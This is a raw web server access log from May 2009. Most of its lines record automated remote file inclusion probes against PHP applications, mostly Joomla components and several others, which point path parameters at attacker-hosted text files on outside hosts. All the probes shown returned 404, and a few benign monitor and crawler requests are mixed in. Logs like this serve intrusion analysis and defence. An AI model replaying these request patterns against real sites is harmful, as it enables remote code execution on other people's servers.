212.150.52.114 - - [23/May/2009:01:32:53 -0400] "GET //skin/zero_vote/error.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:32:53 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:32:53 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:33:07 -0400] "GET /logs/error_log.Q109051400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:33:10 -0400] "GET /logs/error_log.Q109051400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:33:14 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:33:14 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:33:14 -0400] "GET /logs/access_log.Q108111500/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:33:14 -0400] "GET /logs/access_log.Q108110900/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:33:15 -0400] "GET /logs/error_log.Q109051300/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:33:19 -0400] "GET /logs/error_log.Q108081200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:33:32 -0400] "GET /logs/error_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:33:36 -0400] "GET /logs/error_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:34:14 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:34:24 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:34:24 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:34:24 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:34:25 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:34:26 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:34:26 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:34:48 -0400] "GET /logs/error_log.Q109051100//?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:34:49 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.246.124.211 - - [23/May/2009:01:35:38 -0400] "GET /logs/index.php?arquivo=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.246.124.211 - - [23/May/2009:01:35:38 -0400] "GET /index.php?arquivo=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:35:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.44 - - [23/May/2009:01:35:56 -0400] "GET /logs/access_log.Q108092000 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.44 - - [23/May/2009:01:35:57 -0400] "GET /logs/access_log.Q109031800 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.44 - - [23/May/2009:01:35:58 -0400] "GET /logs/access_log.Q108090300 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.44 - - [23/May/2009:01:35:59 -0400] "GET /logs/access_log.Q108072200 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.185.20.88 - - [23/May/2009:01:36:51 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:36:51 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:36:51 -0400] "GET /logs/access_log.Q108121900%20%20/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:36:55 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:36:55 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:36:55 -0400] "GET /logs/access_log.Q108121900%20%20/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:01:37:48 -0400] "GET //login.php?dir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:01:37:48 -0400] "GET /logs//login.php?dir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:01:37:51 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:37:57 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:38:05 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:38:20 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:01:38:25 -0400] "GET /logs/access_log.Q108091400//login.php?dir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:38:28 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:39:43 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:39:43 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:39:44 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:39:53 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:39:53 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:39:53 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:40:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:01:40:55 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:40:55 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:40:55 -0400] "GET /logs/access_log.Q108121900%20%20/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:41:08 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:41:12 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:41:15 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:41:15 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:41:15 -0400] "GET /logs/access_log.Q108121900%20%20/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:41:36 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:01:41:40 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:42:25 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:01:42:40 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:01:43:16 -0400] "GET /logs/access_log.Q108091400//errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:01:43:16 -0400] "GET /logs/access_log.Q108052700%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:01:43:21 -0400] "GET /logs/access_log.Q109021200%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:01:43:29 -0400] "GET /logs/access_log.Q108112400//errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:43:54 -0400] "GET /logs//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:43:54 -0400] "GET //errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:43:54 -0400] "GET /logs/error_log.Q108081200%20%20//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:43:54 -0400] "GET /logs/error_log.Q108051600%20%20//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:01:44:10 -0400] "GET /logs/access_log.Q109030500/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:44:11 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:44:11 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
220.245.81.22 - - [23/May/2009:01:44:31 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
220.245.81.22 - - [23/May/2009:01:44:33 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
220.245.81.22 - - [23/May/2009:01:44:35 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/r.jpg?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:01:44:36 -0400] "GET /logs/access_log.Q108121200//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:01:44:37 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 252 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.185.20.88 - - [23/May/2009:01:45:16 -0400] "GET /logs/access_log.Q108111500/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:45:16 -0400] "GET /logs/access_log.Q108110900/appserv/main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:45:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.125.233.222 - - [23/May/2009:01:46:00 -0400] "GET /logs/access_log.Q109030200//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:01:46:00 -0400] "GET /logs/access_log.Q109030200//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:01:46:00 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 252 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.227.193.198 - - [23/May/2009:01:46:49 -0400] "GET //errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:01:46:49 -0400] "GET /logs/error_log.Q108051600%20%20//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:01:46:49 -0400] "GET /logs//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:01:47:30 -0400] "GET /logs/access_log.Q108110900//dotproject//includes/db_connect.php?baseDir=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:01:47:30 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:01:47:30 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:30 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:52 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:52 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:52 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:53 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:53 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:47:53 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:01:48:11 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
218.185.20.88 - - [23/May/2009:01:48:12 -0400] "GET /logs/access_log.Q108091400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:48:13 -0400] "GET /logs/access_log.Q108091400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:48:36 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:48:36 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:48:36 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:01:48:58 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
116.50.163.164 - - [23/May/2009:01:49:24 -0400] "GET /logs//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
116.50.163.164 - - [23/May/2009:01:49:24 -0400] "GET /logs/access_log.Q108073000//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
116.50.163.164 - - [23/May/2009:01:49:24 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:01:49:32 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:32 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:32 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:32 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:33 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:33 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:33 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:49:33 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.248.128.84 - - [23/May/2009:01:49:40 -0400] "GET /logs/error_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
69.248.128.84 - - [23/May/2009:01:49:41 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
216.104.47.218 - - [23/May/2009:01:49:41 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:49:41 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.248.128.84 - - [23/May/2009:01:49:41 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
216.104.47.218 - - [23/May/2009:01:49:41 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:01:49:44 -0400] "GET /logs/error_log.Q109050400%20%20//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:01:49:49 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
